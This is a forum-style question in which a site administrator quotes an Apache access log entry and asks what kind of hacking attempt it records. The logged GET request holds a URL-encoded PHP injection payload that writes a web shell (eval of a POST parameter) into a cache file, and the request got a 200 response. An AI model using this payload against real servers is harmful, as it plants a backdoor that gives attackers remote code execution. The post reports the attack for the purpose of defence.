Can Hacker Post data through GET request?
Today we have received following request in the Apache access logs file.
"GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5Bshine%5D);?%3E');echo%20'%7C%3C-'; HTTP/1.1" 200 42303
As clearly seen from above request URL, the hacker is trying to attempt POST the data or file through GET request and surprisingly he has got 200 Status Code in Response status.
Which type of hacking attempt is it?
Note:- For Security reason, we have blocked all POST request except some forms URL on our server.
So any hacker who is trying to post some malicious data on our server will get 403 Status code in Response
above hacker POSTED Some data through GET Request and he has got 200 Status Code in Response.
Please help me in knowing which type of hacking technique is this?